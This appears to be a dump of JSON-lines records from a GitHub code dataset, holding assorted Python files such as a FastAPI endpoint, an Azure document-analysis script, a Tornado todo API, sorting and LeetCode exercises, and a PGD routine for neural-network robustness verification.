observation(cls, env) -> Dict[int, np.ndarray]:\r\n \"\"\"Select features for MA setting & flatten each UE's features.\"\"\"\r\n\r\n # get features for currently active UEs\r\n \"\"\" active = set([ue.ue_id for ue in env.active if not env.done])\r\n features = env.features()\r\n features = {ue_id: obs for ue_id, obs in features.items() if ue_id in active} \"\"\"\r\n\r\n # select observations for multi-agent setting from base feature set\r\n \"\"\" obs = {\r\n ue_id: [obs_dict[key] for key in cls.features]\r\n for ue_id, obs_dict in features.items()\r\n }\r\n \"\"\"\r\n # flatten each UE's Dict observation to vector representation\r\n \"\"\" obs = {\r\n ue_id: np.concatenate([o for o in ue_obs]) for ue_id, ue_obs in obs.items()\r\n } \"\"\"\r\n\r\n bundles = []\r\n for inp in env.inps:\r\n bundles.append([inp.inp_id, inp.bundle[\"storage\"], inp.bundle[\"vCPU\"]])\r\n\r\n observations = {\r\n sp.sp_id: {\r\n \"budget\": {sp.Budget},\r\n \"bundles\": bundles,\r\n \"tasks\": [[0 for _ in range(4)] for _ in range(env.NUM_USERS)],\r\n \"net-states\": [],\r\n }\r\n for sp in env.sps\r\n }\r\n\r\n for ue in env.users:\r\n observations[ue.current_sp][\"tasks\"][ue.ue_id] = [\r\n ue.ue_id,\r\n ue.task.computing_req,\r\n ue.task.data_req,\r\n ue.task.latency_req,\r\n ]\r\n\r\n for ue in env.users:\r\n for es in env.edge_servers:\r\n observations[ue.current_sp][\"net-states\"].append(\r\n [ue.ue_id, es.es_id, env.channel.snr(env.stations[es.bs_id], ue)]\r\n )\r\n\r\n print(observations[1][\"budget\"])\r\n return observations\r\n\r\n @classmethod\r\n def action(cls, env, action: Dict[int, int]):\r\n \"\"\"Base environment by default expects action dictionary.\"\"\"\r\n return action\r\n","repo_name":"0xdia/mobile-env","sub_path":"mobile_env/handlers/multi_agent.py","file_name":"multi_agent.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"70943525353","text":"from app import app\nfrom app.database import db\nfrom app.database.models.timetable import Timetable\nfrom fastapi import Depends, Response, status\nfrom fastapi_jwt_auth import AuthJWT\nfrom pydantic import BaseModel\n\n\nclass RequestBody(BaseModel):\n subject_id: int\n meeting_link: str\n start_time: str\n duration: int\n day: str\n\n\n@app.post(\"/admin/add_timetable\")\nasync def add_timetable(\n body: RequestBody, response: Response, Auth: AuthJWT = Depends()\n):\n Auth.jwt_required()\n \n timetable = Timetable()\n timetable.subject_id = body.subject_id\n timetable.meeting_link = body.meeting_link\n timetable.start_time = body.start_time\n timetable.duration = body.duration\n timetable.day = body.day\n\n try:\n db.add(timetable)\n db.commit()\n except Exception as e:\n response.status_code = status.HTTP_503_UNAVAILABLE\n return {\"result\": \"fail\", \"reason\": str(e)}\n\n return {\"result\": \"ok\"}\n","repo_name":"himanshuvarandani/Electron-Server","sub_path":"app/routes/admin/add_timetable.py","file_name":"add_timetable.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25924481565","text":"import json\nfrom pypdf import PdfReader\n\n\nurl_test = './sample-pdf/sample_pdf.pdf'\nurl_test = './sample-pdf/sample_pdf-copy.pdf'\n# pdf = PdfReader('./sample-pdf/sample_pdf.pdf')\n\n# page_content = {\n# }\n\n# for indx, pdf_page in enumerate(pdf.pages):\n\n# \tpage_content[indx + 1] = pdf_page.extract_text()\n\n# print(page_content)\n\n\n\nfrom azure.core.exceptions import ResourceNotFoundError\nfrom azure.ai.formrecognizer import FormRecognizerClient, FormTrainingClient, DocumentAnalysisClient\nfrom azure.core.credentials import AzureKeyCredential\n\n\ncredentials = json.load(open('./pass_keys.json'))\n\nENDPOINT = credentials['ENDPOINT']\nAPIKEY = credentials['API-KEY']\n\n\n# DocumentAnalysisClient.begin\ndocument_analysis_client = DocumentAnalysisClient(ENDPOINT, AzureKeyCredential(APIKEY))\n\n\n# poller = form_client.begin_recognize_content_from_url(url_test)\n\n\nwith open(url_test, \"rb\") as f:\n poller = document_analysis_client.begin_analyze_document(\n \"prebuilt-document\", f.read(), pages='1, 5 '\n )\n\n# with open(url_test, 'rb') as f1:\n# \tfile_content = f1.read().decode('utf-8')\n# \tprint(file_content)\n\n# # import \n\nresult = poller.result()\n# json_string = json.dumps(result.__dict__, indent=4)\n\nimport pickle\n# with open('save.pkl' as )\nwith open('save.pkl', 'wb') as f:\n\tpickle.dump(result, f)\n\n\nwith open(url_test, \"rb\") as f:\n poller = document_analysis_client.begin_analyze_document(\n \"prebuilt-layout\", f.read()#, pages='1, 5 '\n )\n\nresult = poller.result()\n\nwith open('layout_build.pkl', 'wb') as f:\n\tpickle.dump(result, f)\n\n\n\n# Imprime la cadena JSON resultante\n# print(json_string)\n\n# text = ''\n# for page in result.pages:\n# \tfor line in page.lines:\n# \t\ttext+=line.content + ' '\n\n# text = text.strip()\n# print(text)\n\n# print(dir(result))\n# print(len(result.pages))\n# for page in result.pages:\n# print(\"----Analyzing layout from page #{}----\".format(page.page_number))\n# print(\n# \"Page has width: {} and height: {}, measured with unit: {}\".format(\n# page.width, page.height, page.unit\n# )\n# )\n","repo_name":"alexanderquispe/DigitalPillarAI","sub_path":"04_azure_recognizer/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18304677276","text":"from setuptools import setup\n\nwith open(\"README.rst\", \"r\") as f:\n description = f.read()\n\nversion_info = (0, 2, 5)\nversion = '.'.join(map(str, version_info))\n\nsetup(\n name='sqlalchemy-vertica',\n version=version,\n description='Vertica dialect for sqlalchemy',\n long_description=description,\n license='MIT',\n url='https://github.com/startappdev/sqlalchemy-vertica',\n download_url='https://github.com/startappdev/sqlalchemy-vertica/tarball/%s' % (version,),\n author='StartApp Inc.',\n author_email='ben.feinstein@startapp.com',\n packages=(\n 'sqlalchemy_vertica',\n ),\n install_requires=(\n 'six >= 1.10.0',\n 'sqlalchemy >= 1.1.11',\n ),\n extras_require={\n 'pyodbc': [\n 'pyodbc>=4.0.16',\n ],\n 'vertica-python': [\n 'psycopg2>=2.7.1',\n 'vertica-python>=0.7.3',\n ],\n },\n entry_points={\n 'sqlalchemy.dialects': [\n 'vertica.pyodbc = '\n 'sqlalchemy_vertica.dialect_pyodbc:VerticaDialect [pyodbc]',\n 'vertica.vertica_python = '\n 'sqlalchemy_vertica.dialect_vertica_python:VerticaDialect [vertica-python]',\n ]\n }\n)\n","repo_name":"taboola/sqlalchemy-vertica","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"40422607602","text":"import os\n\n\ndef display_details(i, rank):\n if i not in d.keys():\n print(\"No Student with this Roll Number.\")\n return\n print(\"Student Details =>\")\n print(\"Name:\", d[i][0])\n print(\"Roll Number:\", i)\n print(\"Marks -> \\tMaths:\", d[i][1][0], \"; CS:\",\n d[i][1][1], \"; Science:\", d[i][1][2])\n print(\"Mean Marks:\", d[i][2])\n print(\"Median Marks:\", d[i][3])\n print(\"Rank in Class:\", rank.index(d[i][1][3])+1)\n print(\"----------------\")\n\n\n# MAIN CODE\nd = dict() # FORMAT - [ROLL : [NAME,[MATH,CS,SCIENCE,TOTAL],MEAN,MEDIAN]]\nrank = list()\nn = int(input(\"Enter number of Students -> \"))\nfor i in range(n):\n print(\"Student\", i+1, \"Details =>\")\n roll = int(input(\"Enter Roll Number: \"))\n name = input(\"Enter Name of Student: \")\n marks = [int(input(\"Maths: \")), int(\n input(\"CS: \")), int(input(\"Science: \"))]\n marks += [(marks[0]+marks[1]+marks[2]), ]\n\n avg = (marks[3])/3\n median_list = list(marks)\n median_list.sort()\n rank += [marks[3], ]\n\n d[roll] = [name, marks, avg, median_list[1]]\n\nrank.sort(reverse=True)\n\n# Clearing the Screen\n# posix is os name for linux or mac\nif(os.name == 'posix'):\n os.system('clear')\n# else screen will be cleared for windows\nelse:\n os.system('cls')\n\nprint(\"HELLO\")\n\nwhile(True):\n print(\"\\nMENU (Enter Choice Number below) ->\\n1. Display list of users\")\n print(\"2. Display student details from Roll number\")\n print(\"3. Display student details from Name\")\n print(\"0. Exit\")\n choice = int(input(\"-> \"))\n if choice == 0:\n print(\"BYE BYE !!\")\n break\n elif choice == 1:\n print(\"Roll Number - Name\")\n for i in d:\n print(i, d[i][0], sep=\"\\t- \")\n print(\"----------------\")\n\n elif choice == 2:\n i = int(input(\"Enter Roll Number: \"))\n display_details(i, rank)\n\n elif choice == 3:\n name = input(\"Enter Name: \")\n found = False\n for i in d.keys():\n if d[i][0].lower() == name.lower():\n display_details(i, rank)\n found = True\n break\n if not found:\n print(\"Student not present with this Name.\")\n","repo_name":"b-beri/ISS","sub_path":"Assignment-3A/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31614837534","text":"\"\"\"Quicksort\"\"\"\n\n\ndef partition(arr, low, high):\n pivot = arr[high]\n i = low - 1\n for j in range(low, high):\n if arr[j] < pivot:\n i = i + 1\n swap = arr[i]\n arr[i] = arr[j]\n arr[j] = swap\n swap = arr[i + 1]\n arr[i + 1] = arr[high]\n arr[high] = swap\n return i + 1\n\n\ndef quickSort(arr, low, high):\n\n if (low < high):\n \"\"\" pi is partitioning index, arr[pi] is now\n at right place \"\"\"\n pi = partition(arr, low, high)\n quickSort(arr, low, pi - 1) # Before pi\n quickSort(arr, pi + 1, high) # After pi\n\n\n# Print array\n\n\ndef printArray(arr):\n for i in range(len(arr)):\n print(arr[i], end=\" \")\n print()\n\n\narr = [5, 2, 3, 4, 1, 1, 2, 4, 50, 23, 12, 52, 12, 422, 112, 893212, 21,\n 23, 4, 4214, 421, 21312, 241, -1, -2311, 0, -213, 41212, 21, 2145, 657]\nprint(\"Before Sorting: \")\nprintArray(arr)\nquickSort(arr, 0, len(arr)-1)\nprint(\"After Sorting: \")\nprintArray(arr)\n","repo_name":"DevDey/Algorithms","sub_path":"Project_1/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16569828844","text":"#lab10b\n\ntdict={}\nimport socket\nfrom time import sleep\n\ndef ctdict():\n l = int(input(\"enter the length of dictionary you want to enter: \"))\n for i in range(l):\n sname = input(\"Enter a website (URL): \")\n ipadd = socket.gethostbyname(sname)\n print(sname + \" \" + ipadd)\n tdict.update({sname: ipadd})\n print(tdict)\n\n\ndef b1():\n\n find=input(\"to check if it is in the dictionary enter a URL: \")\n if (find in tdict):\n print(find + \" is in the directory\")\n else:\n print(find + \" is not in the directory\")\n\ndef b2():\n adname = input(\"Enter a website (URL): \")\n adipadd = socket.gethostbyname(adname)\n tdict.update({adname: adipadd})\n print(adname + \" \" + adipadd + \" has been added to the directory\")\n print(tdict)\n\ndef b3():\n n = len(tdict)\n print(n)\n print(tdict.keys())\n a = input(\"enter the URL you want to delete from the directory: \")\n tdict.pop(a)\n print(\"the new directory is: \" + str(tdict))\ndef b4():\n n = len(tdict)\n print(n)\n print(tdict.keys())\n a = input(\"which URL you want to update the IP address?\\n\")\n u = input(\"enter the new IP address:\\n\")\n tdict.update({a: u})\n print(\"the new directory is: \" + str(tdict))\ndef b5():\n print(\"URL and IP for this dictionary are:\\n\")\n for k, v in tdict.items():\n print(k, v)\n\n\ndef b6():\n print(\"going back to main menu\")\n sleep(2)\n\n\ndef bmenu():\n ctdict()\n while(True):\n b_choice=input(\"Enter a a number between 1-6 to choose from the following options\\n1. Search for a URL from a dictionary\\n2. Add a URL + IP address to a dictionary\\n3. delete a URL from a dictionary\\n4. Update the ip address of a specific URL\\n5. print all IP's to the screen\\n6. if you want to quit\\nenter your choice: \")\n if (b_choice == \"1\"):\n b1()\n elif(b_choice == \"2\"):\n b2()\n elif(b_choice == \"3\"):\n b3()\n elif (b_choice == \"4\"):\n b4()\n elif (b_choice == \"5\"):\n b5()\n elif (b_choice == \"6\"):\n b6()\n break\n else:\n print(\"invalid choice, please enter a number between 1-5\")\n continue","repo_name":"hweber01/DEVOPS","sub_path":"LESSON 04/LAB10B.py","file_name":"LAB10B.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24138810914","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None findValueMostElement largestValues\n\nfrom collections import deque\n\n\nclass Solution(object):\n\n def findValueMostElement(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return []\n ret = []\n while len(bfsList):\n bfsList2 = []\n ret.append(max([i.val for i in bfsList]))\n for i in bfsList:\n # print i.val\n if i and i.left:\n bfsList2.append(i.left)\n if i and i.right:\n bfsList2.append(i.right)\n bfsList = bfsList2\n return ret\n\n def findValueMostElement(self, root):\n if not root:\n return []\n bfsList = deque([root])\n ret = []\n while len(bfsList):\n ret.append(max([i.val for i in bfsList]))\n for _ in range(len(bfsList)):\n i = bfsList.popleft()\n if i.left:\n bfsList.append(i.left)\n if i.right:\n bfsList.append(i.right)\n return ret\n","repo_name":"AlienceGG/LeetCode-3","sub_path":"problems/515.Find_Largest_Element_in_Each_Row/li_bfs.py","file_name":"li_bfs.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"27651418146","text":"import torch\n\nclass ProjectedGradientDescent:\n def __init__(self, config):\n self.config = config\n\n def start(self, prob):\n \"\"\"\n PGD (see Madry et al. 2017): https://arxiv.org/pdf/1706.06083.pdf\n \n Arguments:\n prob:\n Verification Problem.\n Returns:\n A tensor for the adversarial example.\n \"\"\"\n true_label = prob.spec.is_adversarial_robustness()\n if true_label == -1:\n return None\n\n\n # Step size to attack iterations.\n eps_iter = prob.spec.input_node.bounds.get_range() / self.config.VERIFIER.PGD_EPS\n # Number of attack iterations\n num_iter = self.config.VERIFIER.PGD_NUM_ITER\n\n # Generate a uniformly random tensor within the specification bounds.\n distribution = torch.distributions.uniform.Uniform(\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n adv = distribution.sample(torch.Size([1]))\n adv = torch.squeeze(adv, 0)\n \n # untargeted output\n y = torch.tensor([true_label])\n\n i = 0\n while i < num_iter:\n adv = self.fast_gradient_signed(\n prob,\n adv,\n eps_iter,\n y=y,\n targeted=False\n )\n\n adv = torch.clamp(\n adv,\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n\n logits = prob.nn.forward(adv)\n if prob.spec.is_satisfied(logits, logits) is not True:\n return adv.detach()\n\n i += 1\n\n return None\n\n def fast_gradient_signed(\n self,\n prob,\n x,\n eps,\n y=None,\n targeted=False\n ):\n \"\"\"\n Fast Gradient Signed Method.\n\n Arguments: \n prob:\n Verification Problem.\n x:\n Input tensor.\n eps:\n Epsilon.\n y:\n The true output or the targeted output if targeted is set to true. \n targeted:\n Whether or not the attack is targeted.\n Returns: \n A tensor for the adversarial example.\n \"\"\"\n\n true_label = prob.spec.is_adversarial_robustness()\n if true_label == -1:\n raise NotImplementedError(\"PGD is supported only for Linf adversarial robustness\")\n\n assert torch.all(eps <= prob.spec.input_node.bounds.get_range())\n\n x = x.clone().detach().to(torch.float).requires_grad_(True)\n if y is None:\n y = torch.tensor([true_label])\n \n # Compute gradient\n loss_fn = torch.nn.CrossEntropyLoss()\n loss = loss_fn(prob.nn.forward(x)[None, :], y)\n if targeted:\n loss = -loss\n loss.backward()\n\n # compute perturbation\n perturbation = eps * torch.sign(x.grad)\n\n adv = torch.clamp(\n x + perturbation,\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n\n return adv\n","repo_name":"vas-group-imperial/venus2","sub_path":"venus/verification/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15497390285","text":"from src.main.DB.DBConstants import DBConstants\nfrom src.main.Intents.IntentBase import IntentBase\nfrom src.main.DB.DBUtility import DBUtility\nfrom flask import session\n\nclass MostFileContainsBugs(IntentBase):\n def __init__(self, request):\n self.request = request\n\n def ProcessRespone(self):\n\n count = 1\n response = \"\"\n connection = DBUtility.getMYSQLConnection();\n try:\n with connection.cursor() as cursor:\n\n sql = 'SELECT DISTINCT(ClassID), count(ClassID) AS count FROM CommitClass left join GitInfo on CommitClass.CommitID=GitInfo.cHash where CommitClass.ProjectID=%s and GitInfo.contains_bug=TRUE GROUP BY ClassID HAVING count > 1 order by count DESC limit 10;'\n cursor.execute(sql, (session[\"projectID\"]))\n result = cursor.fetchone()\n while (result):\n response += str(count) + \"- \" + str(result[DBConstants.ClassID]) + \" has \" + str(result[\"count\"]) + \" buggy commits\" + \"\\n\\n\"\n result = cursor.fetchone()\n count += 1\n\n if response == \"\":\n response = \"Wow! There are no buggy files in the repo\"\n\n print(\"----------------RESULT------------------\")\n print(response)\n finally:\n connection.close()\n\n\n\n return response","repo_name":"ahmad-abdellatif/MSRBot","sub_path":"src/main/Intents/IssueIntents/MostFileContainsBugs.py","file_name":"MostFileContainsBugs.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42684908239","text":"import numpy as np\nimport random\n#import math\n\ncount = 0;\n\n# Lendo o arquivo e usando sua primeira linha para saber o tamanho da matriz\n\nfilename = \"./Entradas/\"+input(\"Nome do arquivo: \")\n\narq = open(filename, 'r')\n#arq = open('./Entradas/Entrada 10.txt', 'r')\n\nprimeiraLinha = arq.readline()\narq.close()\nnumeroMatriz = int(primeiraLinha)\nauxM = np.zeros((numeroMatriz+1, numeroMatriz))\n\n#=============================================\n\n#arq = open('./Entradas/Entrada 10.txt', 'r')\narq = open(filename, 'r')\n\n# Transformando os dados do arquivo em uma matriz\n\nfor linha in arq:\n auxLinha = linha\n Lista = auxLinha.split()\n nums = [int(s) for s in Lista]\n auxM[count,:] = nums[:]\n count = count+1\n\nauxM = np.delete(auxM, (0), 0)\n\nlistaPercorrida = []\nmaiorDistancia = numeroMatriz + 1\n\nwhile (len(listaPercorrida) < numeroMatriz):\n ca = random.randrange(0, numeroMatriz)\n listaPercorrida = []\n listaPercorrida.append(ca)\n \n menDis = 0\n \n while menDis < maiorDistancia:\n proxCidade = 0\n menDis = maiorDistancia\n for cd in range(numeroMatriz):\n for j in range(len(listaPercorrida)):\n if not(cd in listaPercorrida):\n if auxM[ca][cd] != 0:\n if auxM[ca][cd] < menDis:\n menDis = auxM[ca][cd]\n proxCidade = cd\n \n if menDis != maiorDistancia:\n listaPercorrida.append(proxCidade)\n ca = proxCidade\n print(len(listaPercorrida))","repo_name":"gus-rautenberg/TSP-tabu","sub_path":"tabuSearch.py","file_name":"tabuSearch.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8361371657","text":"\"\"\"View classes for the todo list.\"\"\"\nfrom datetime import datetime\nimport json\n\nfrom passlib.hash import pbkdf2_sha256 as hasher\n\nfrom tornado_todo.models import Profile, Task\n\nfrom tornado.gen import coroutine\nfrom tornado.web import RequestHandler\nfrom tornado_sqlalchemy import SessionMixin, as_future\n\n\nclass BaseHandler(RequestHandler, SessionMixin):\n \"\"\"Base request handler for all upcoming views.\"\"\"\n\n def prepare(self):\n \"\"\"Set up some attributes before any method receives the request.\"\"\"\n self.form_data = self._convert_to_unicode(self.request.arguments)\n self.response = {}\n\n def set_default_headers(self):\n \"\"\"Set the default response header to be JSON.\"\"\"\n self.set_header(\"Content-Type\", 'application/json; charset=\"utf-8\"')\n\n def send_response(self, data, status=200):\n \"\"\"Construct and send a JSON response with appropriate status code.\"\"\"\n self.set_status(status)\n self.write(json.dumps(data))\n\n def _convert_to_unicode(self, data_dict):\n \"\"\"Convert the incoming data dictionary to have unicode values.\"\"\"\n output = {key: [val.decode('utf8') for val in val_list] for key, val_list in data_dict.items()}\n return output\n\nclass AuthenticationMixin:\n # todo: extend \"prepare\" method to include authentication\n def prepare(self):\n authorized = self.get_current_user()\n if authorized:\n super().prepare()\n else:\n self.send_forbidden_response()\n self.finish()\n\n def get_current_user(self):\n token_cookie = self.get_secure_cookie('auth_token')\n if token_cookie:\n username, token = token_cookie.split(':')\n with self.make_session() as session:\n profile = session.query(Profile).filter(Profile.username == username).first()\n if profile and profile.token == token:\n return True\n\n def authenticate_response(self, profile):\n token_cookie = f\"{profile.username}:{profile.token}\"\n self.set_secure_cookie('auth_token', token_cookie)\n\n def send_forbidden_response(self):\n data = {'error': 'You do not have permission to access this profile.'}\n self.set_status(403)\n self.write(json.dumps(data))\n\n\nclass InfoView(BaseHandler):\n \"\"\"Simple view to return route information.\"\"\"\n SUPPORTED_METHODS = (\"GET\",)\n\n def get(self):\n \"\"\"Handle a GET request for route information.\"\"\"\n routes = {\n 'info': 'GET /api/v1',\n 'register': 'POST /api/v1/accounts',\n 'single profile detail': 'GET /api/v1/accounts/',\n 'edit profile': 'PUT /api/v1/accounts/',\n 'delete profile': 'DELETE /api/v1/accounts/',\n 'login': 'POST /api/v1/accounts/login',\n 'logout': 'GET /api/v1/accounts/logout',\n \"user's tasks\": 'GET /api/v1/accounts//tasks',\n \"create task\": 'POST /api/v1/accounts//tasks',\n \"task detail\": 'GET /api/v1/accounts//tasks/',\n \"task update\": 'PUT /api/v1/accounts//tasks/',\n \"delete task\": 'DELETE /api/v1/accounts//tasks/'\n }\n self.write(json.dumps(routes))\n\n\nclass RegistrationView(BaseHandler):\n \"\"\"View for registering a new user.\"\"\"\n SUPPORTED_METHODS = (\"POST\",)\n\n @coroutine\n def post(self):\n \"\"\"Handle a POST request for user registration.\"\"\"\n needed = ['username', 'email', 'password', 'password2']\n if all([key in self.form_data for key in needed]):\n username = self.form_data['username'][0]\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if not profile:\n if self.form_data['password'] == self.form_data['password2']:\n self.build_profile(session)\n self.send_response({'msg': 'Profile created'}, status=201)\n else:\n self.send_response({'error': \"Passwords don't match\"}, status=400)\n\n def build_profile(self, session):\n \"\"\"Create new profile using information from incoming request.\"\"\"\n hashed_password = hasher.hash(self.form_data['password'][0])\n new_profile = Profile(\n username=self.form_data['username'][0],\n password=hashed_password,\n email=self.form_data['email'][0]\n )\n session.add(new_profile)\n session.commit()\n\n\nclass ProfileView(AuthenticationMixin, BaseHandler):\n \"\"\"View for reading or modifying an existing profile.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"PUT\", \"DELETE\")\n\n @coroutine\n def get(self, username):\n \"\"\"Handle incoming get request for a specific user's profile.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n self.authenticate_response(profile)\n self.send_response(profile.to_dict())\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=403)\n\n @coroutine\n def put(self, username):\n \"\"\"Handle incoming put request to update a specific profile.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n if 'username' in self.form_data:\n profile.username = self.form_data['username'][0]\n if 'password' in self.form_data and 'password2' in self.form_data and self.form_data['password'] == self.form_data['password2'] and self.form_data['password'][0] != '':\n profile.password = hasher.hash(self.form_data['password'][0])\n if 'email' in self.form_data:\n profile.email = self.form_data['email'][0]\n session.add(profile)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({\n 'msg': 'Profile updated.',\n 'profile': profile.to_dict(),\n 'username': profile.username\n }, status=202)\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=403)\n\n @coroutine\n def delete(self, username):\n \"\"\"Delete an existing task from the database.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n session.delete(profile)\n session.commit()\n self.send_response({}, status=204)\n\n\nclass TaskListView(AuthenticationMixin, BaseHandler):\n \"\"\"View for reading and adding new tasks.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"POST\",)\n\n @coroutine\n def get(self, username):\n \"\"\"Get all tasks for an existing user.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n tasks = [task.to_dict() for task in profile.tasks]\n self.authenticate_response(profile)\n self.send_response({\n 'username': profile.username,\n 'tasks': tasks\n })\n else:\n self.send_response({'error': 'The profile does not exist'}, status=404)\n\n @coroutine\n def post(self, username):\n \"\"\"Create a new task.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n due_date = self.form_data['due_date'][0]\n try:\n task = Task(\n name=self.form_data['name'][0],\n note=self.form_data['note'][0],\n creation_date=datetime.now(),\n due_date=datetime.strptime(due_date, '%d/%m/%Y %H:%M:%S') if due_date else None,\n completed=self.form_data['completed'][0],\n profile_id=profile.id,\n profile=profile\n )\n session.add(task)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({'msg': 'posted'}, status=201)\n except KeyError:\n self.authenticate_response(profile)\n self.send_response({'error': 'Some fields are missing'}, 400)\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=404)\n\n\nclass TaskView(AuthenticationMixin, BaseHandler):\n \"\"\"Request handling methods for an individual task.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"PUT\", \"DELETE\")\n\n def get(self, username, task_id):\n \"\"\"Get detail for an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile).get(task_id))\n if task:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': task.to_dict()})\n else:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': None}, status=404)\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n def put(self, username, task_id):\n \"\"\"Update an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile).get(task_id))\n if task:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': task.to_dict()})\n else:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': None}, status=404)\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n def delete(self, username, task_id):\n \"\"\"Delete an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile).get(task_id))\n if task:\n session.delete(task)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({'username': username, 'msg': 'Deleted.'})\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n\nclass LoginView(BaseHandler):\n \"\"\"View for logging in.\"\"\"\n SUPPORTED_METHODS = (\"POST\",)\n\n def post(self):\n \"\"\"Log a user in.\"\"\"\n needed = ['username', 'password']\n if all([key in self.form_data for key in needed]):\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile and hasher.verify(self.form_data['password'][0], profile.password):\n self.authenticate_response(profile)\n self.send_response({'msg': 'Authenticated'})\n else:\n self.send_response({'error': 'Incorrect username/password combination.'}, status=400)\n\n else:\n self.send_response({'error': 'Some fields are missing'}, status=400)\n\n\nclass LogoutView(BaseHandler):\n \"\"\"View for logging out.\"\"\"\n SUPPORTED_METHODS = (\"GET\",)\n\n def get(self):\n \"\"\"Log a user out.\"\"\"\n self.send_response({'msg': 'Logged out.'})\n","repo_name":"PythonToDoList/tornado","sub_path":"tornado_todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"34230267898","text":"import torch\nimport pandas as pd\nimport os\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader, IterableDataset\nfrom itertools import islice\nfrom matplotlib import pyplot as plt\nROOT_DIR = \"/data/beegfs/home/raichuna/thesis-fraunhofer-iis/Dataset\"\n\ndef normalize_quaternion(q):\n \"\"\"torch.norm has the default norm of 2 squaroot(sum of squares) \"\"\"\n norm = torch.norm(q, dim=1)\n q_norm = torch.div(q, norm[:, None])\n return q_norm\n\ndef hamilton_product(quat1, quat2):\n a1, b1, c1, d1 = quat1\n a2, b2, c2, d2 = quat2\n q1 = a1*a2- b1*b2 - c1*c2 -d1*d2\n q2 = a1*b2 + b1*a2 + c1*d2 - d1*c2\n q3 = a1*c2 - b1*d2 + c1*a2 + d1*b2\n q4 = a1*d2 + b1*c2 - c1*b2 + d1*a2\n return np.array([q1, q2, q3, q4])\n\ndef trajectory_poses(poses_predicted, initial_pose):\n final_poses = np.empty((0,7))\n #for x in islice(poses_predicted, 200):\n for x in poses_predicted:\n delta_p = x[:3] \n delta_q = x[3:] / np.linalg.norm(x[3:])\n pt_1 = initial_pose[:3]\n qt_1 = initial_pose[3:] / np.linalg.norm(initial_pose[3:])\n \n r = R.from_quat(qt_1)\n qt_1_mat = r.as_matrix()\n p = pt_1 + np.matmul(qt_1_mat, 